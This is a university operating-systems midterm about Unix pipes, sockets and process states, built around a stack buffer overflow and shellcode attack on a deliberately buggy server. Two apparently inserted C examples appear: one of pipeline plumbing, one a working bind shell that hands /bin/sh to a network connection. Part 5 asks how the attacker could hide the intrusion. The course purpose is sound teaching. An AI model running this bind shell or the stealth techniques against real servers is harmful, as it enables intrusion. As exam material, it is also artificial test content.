CPS 310 midterm exam #2, 4/1/16

Your name please: ___________________ NetID: ___________

A Tale of Two Clients

Plot summary. In which a client Chuck (C) is having a pleasant exchange of requests and responses with server Sam (S), when Mary (M) suddenly appears and attacks Sam. The scenario unfolds exactly as in the lab/project p2. Sam's server runs the "BuggyServer" code you studied for p2, ready to receive connections on port 9000. All processes involved are single-threaded. All participants run "classic Unix". All processes use the various Unix system calls as discussed in class.

The scenarios involve two simple and familiar Unix utility programs. The echo program simply writes its arguments to stdout. The nc program is netcat, which opens a socket and then uses read and write system calls to transfer data from its stdin to the socket and from the socket to its stdout.

Instructions. Answer all questions. Please attempt to confine your answers to the boxes provided. The small boxes are worth 10 points and the large boxes are worth 20 points. Many questions on this exam ask you to explain the process states of Chuck, Mary, and Sam at various stages in the narrative. For those questions, the state of a process is the state of its thread: either Running, Exited, or Blocked. If a process is Blocked, name the system call in which it is blocked and the object it is blocked on. Please assume that each process has had sufficient time to execute to reach a stable state.

As always: "Any kind of pseudocode is fine as long as its meaning is clear. You may assume standard data structures, e.g., linked lists: don't write code for those." If you don't know the answer to a question, then just say something else relevant for partial credit. There are no "April Fools" jokes on this exam, with the possible exception of this statement.

Part 1. In which Chuck sends a request. (50 points)

Chuck types the following command to his shell to issue a valid HTTP request to Sam:

    /bin/echo "GET /file HTTP" | nc sam 9000

(a) What is the state of Sam's server process before the request is sent?

(b) Which of Chuck's processes creates a pipe? How does another process gain access to the pipe?

(c) What is the state of each of Chuck's processes after the request is sent, but before Sam's reply is received?

(d) List the key system calls that the nc process issues before arriving at the state in (c), in the order it issues them.

(e) What causes Chuck's nc process to (eventually) exit?
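The system-call sequence behind Chuck's pipeline, as an added example written for this page (it is not code from the exam or from p2): the parent plays the shell, creating the pipe and forking the two children, each of which inherits the pipe descriptors, rewires them with dup2() and then exec()s its program. The assumptions are that /bin/echo and cat are on the machine and that cat stands in for "nc sam 9000" (a real nc would instead open a socket, connect, and shuttle bytes between stdin/stdout and the socket); a second pipe captures the right-hand child's stdout so the result can be checked rather than printed.

```c
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/wait.h>

/* Run "left | right" the way a shell does, capturing right's stdout in out[].
 * Returns the number of bytes captured, or -1 on error; right's exit status
 * goes in *status. */
ssize_t run_pipeline(char *const left[], char *const right[],
                     char *out, size_t outlen, int *status)
{
    int p[2];    /* the pipe between left and right: p[0] read end, p[1] write end */
    int cap[2];  /* second pipe: right's stdout back to this process */
    if (pipe(p) < 0 || pipe(cap) < 0) return -1;

    pid_t lpid = fork();                  /* child 1 inherits both pipes */
    if (lpid < 0) return -1;
    if (lpid == 0) {
        dup2(p[1], STDOUT_FILENO);        /* stdout -> pipe write end */
        close(p[0]); close(p[1]); close(cap[0]); close(cap[1]);
        execvp(left[0], left);
        _exit(127);                       /* only reached if exec fails */
    }
    pid_t rpid = fork();                  /* child 2 inherits both pipes */
    if (rpid < 0) return -1;
    if (rpid == 0) {
        dup2(p[0], STDIN_FILENO);         /* stdin <- pipe read end */
        dup2(cap[1], STDOUT_FILENO);      /* stdout -> capture pipe */
        close(p[0]); close(p[1]); close(cap[0]); close(cap[1]);
        execvp(right[0], right);
        _exit(127);
    }
    /* The parent must close its own copies. If p[1] stayed open here, the
     * right child would never see EOF on stdin after the left child exits. */
    close(p[0]); close(p[1]); close(cap[1]);

    size_t n = 0;
    while (n < outlen) {
        ssize_t r = read(cap[0], out + n, outlen - n);
        if (r <= 0) break;                /* 0 = EOF: right child closed stdout */
        n += (size_t)r;
    }
    close(cap[0]);

    int st = 0;
    waitpid(lpid, NULL, 0);
    waitpid(rpid, &st, 0);
    if (status) *status = WIFEXITED(st) ? WEXITSTATUS(st) : -1;
    return (ssize_t)n;
}

/* Chuck's command with cat standing in for "nc sam 9000" (constructed input).
 * Returns the byte count when the request came through intact, else -1. */
int check_echo_pipeline(void)
{
    char *left[]  = { "/bin/echo", "GET /file HTTP", NULL };
    char *right[] = { "cat", NULL };
    char out[64];
    int status = -1;
    ssize_t n = run_pipeline(left, right, out, sizeof out, &status);
    if (n != 15 || status != 0 || memcmp(out, "GET /file HTTP\n", 15) != 0)
        return -1;
    return (int)n;
}

int main(void)
{
    int n = check_echo_pipeline();
    printf("%s (%d bytes)\n", n > 0 ? "request delivered" : "pipeline failed", n);
    return n > 0 ? 0 : 1;
}
```

The order of operations matters: the pipe exists before either fork, both children close every descriptor they do not use, and the parent closes its write end before reading, otherwise the reader side can hang waiting for an EOF that never arrives.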

Part 2. In which Mary attacks Sam. (60 points)

Mary types the following command to her shell to issue a valid HTTP request to Sam. The request contains a malicious attack string with an embedded shellcode to inject into Sam's server. Sam's server receives the attack string and copies it into a local buffer variable of its handle() procedure, overflowing the buffer.

    /bin/echo -e "GET <attack string> HTTP" | nc sam 9000

(a) Why is it necessary for the copy to overflow the buffer in order for the attack to be successful?

(b) Mary must guess the location of the buffer in the server's virtual address space, and include a stack address within the attack string. Why is this necessary in order for the attack to be successful?

(c) Draw a picture of Sam's server stack after the handle() procedure is called but before the copy operation occurs ("before"). Be sure to illustrate the key elements that are relevant to the attack.

(d) Draw a picture of Sam's server stack after the copy operation but before handle() returns ("after"). Be sure to show the key regions of the attack string and their locations relative to the elements in (c).

Part 3. In which Sam executes Mary's shellcode. (40 points)

The shellcode is a sequence of machine instructions with the usual behavior: create a fresh socket, bind the socket to a port number (the shell port), listen/accept a connect request from Mary on the shell port, and use the execve system call to run a shell program that receives commands from Mary and sends their output back to her.

(a) One possible outcome is that the server process generates a fault when it executes its first instruction from Mary's attack string. (Let's say the instruction is a NOP.) What is the most likely cause of the fault?

(b) If the attack succeeds in running a shell, what user identity does the attack shell run with? How does Sam's kernel determine what user identity to place in the security label of the shell's process?

(c) The nc process that Mary used to launch the attack (in Part 2) does not exit after the attack. Why not? How is it different from Chuck's nc process in Part 1?

(d) What is the state of Sam's server process after Mary connects to the shell port, but before she sends a shell command?
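The same sequence of system calls the Part 3 shellcode performs, written as ordinary C as an added example for this page (it is not Mary's shellcode or anything from p2): socket/bind/listen, accept, dup2() of the connection onto the shell's stdin/stdout/stderr, then execve() of /bin/sh. Because the real bind-shell path blocks in accept(), the block also includes a small harness that substitutes a socketpair for the TCP connection so the redirection and exec can be exercised offline; the port number 4444 in main() is an arbitrary example value.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/wait.h>

/* socket + bind + listen on the shell port; returns the listening fd or -1 */
int bind_shell_listen(uint16_t port)
{
    int s = socket(AF_INET, SOCK_STREAM, 0);
    if (s < 0) return -1;
    struct sockaddr_in a;
    memset(&a, 0, sizeof a);
    a.sin_family = AF_INET;
    a.sin_addr.s_addr = htonl(INADDR_ANY);
    a.sin_port = htons(port);
    if (bind(s, (struct sockaddr *)&a, sizeof a) < 0 || listen(s, 1) < 0) {
        close(s);
        return -1;
    }
    return s;
}

/* Make conn the shell's stdin/stdout/stderr, then replace this process image
 * with /bin/sh. execve() keeps the caller's uid/gid and every descriptor that
 * lacks FD_CLOEXEC, so the shell runs as whoever the calling process was, with
 * that process's other open sockets still open. Returns only on failure. */
int exec_shell_on(int conn)
{
    dup2(conn, STDIN_FILENO);
    dup2(conn, STDOUT_FILENO);
    dup2(conn, STDERR_FILENO);
    if (conn > STDERR_FILENO) close(conn);
    char *argv[] = { "/bin/sh", NULL };
    char *envp[] = { NULL };              /* empty environment: no PATH */
    execve("/bin/sh", argv, envp);
    return -1;
}

/* accept one connection on the shell port and hand it to the shell */
int serve_shell_once(int listen_fd)
{
    int conn = accept(listen_fd, NULL, NULL);
    if (conn < 0) return -1;
    return exec_shell_on(conn);
}

/* Harness: run `cmd` through a shell attached to one end of a socketpair and
 * collect what comes back. Returns bytes received, or -1 on error. */
ssize_t run_shell_over_socketpair(const char *cmd, char *out, size_t outlen)
{
    int sv[2];
    if (socketpair(AF_UNIX, SOCK_STREAM, 0, sv) < 0) return -1;
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {                       /* child: becomes the shell */
        close(sv[0]);
        exec_shell_on(sv[1]);
        _exit(127);
    }
    close(sv[1]);
    if (write(sv[0], cmd, strlen(cmd)) < 0) return -1;
    shutdown(sv[0], SHUT_WR);             /* EOF on the shell's stdin: it exits */
    size_t n = 0;
    while (n < outlen) {
        ssize_t r = read(sv[0], out + n, outlen - n);
        if (r <= 0) break;
        n += (size_t)r;
    }
    close(sv[0]);
    waitpid(pid, NULL, 0);
    return (ssize_t)n;
}

int main(void)
{
    char out[128];
    ssize_t n = run_shell_over_socketpair("echo hello from the shell\n", out, sizeof out - 1);
    if (n < 0) { perror("harness"); return 1; }
    out[n] = '\0';
    printf("shell replied: %s", out);
    /* The real bind-shell path, not called here because it blocks in accept():
     *   serve_shell_once(bind_shell_listen(4444));   (4444 is an example port) */
    return 0;
}
```

The comment on exec_shell_on() is the practitioner's caveat: nothing in socket, bind, accept or execve changes credentials, and descriptors opened before the exec survive it unless they were marked close-on-exec, which is why a server's own connections remain open in a shell it has been tricked into running.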

Part 4. In which Chuck is out of luck. (30 points)

Chuck repeats the command of Part 1 after Mary initiates the attack, but before Mary disconnects from her attack shell:

    /bin/echo "GET /file HTTP" | nc sam 9000

Chuck types the command, hits the return key, and... nothing happens.

(a) What is the state of Sam's server process at this point?

(b) What is the state of each of Chuck's processes at this point?

(c) What is the state of Sam's server process after Mary disconnects from the attack shell by exiting her client program?

Part 5. In which Mary gets smarter and avoids detection. (20 points)

One weakness of Mary's shellcode is that Chuck might report his problem to Sam, who might then discover Mary's attack. If Mary is busted, she could forfeit her property and be imprisoned for 20 years under 18 U.S.C. §1030 (the Computer Fraud and Abuse Act, CFAA), and regret this sorry episode for the rest of her miserable life.

Propose a solution for Mary. Of course, Mary should not mount the attack at all, but if she is committed to this path of darkness, how could she modify her shellcode to hide her attack from Chuck? How could she avoid disrupting the functioning of Sam's webserver? Discuss any practical difficulties of your idea and any assumptions needed to overcome them.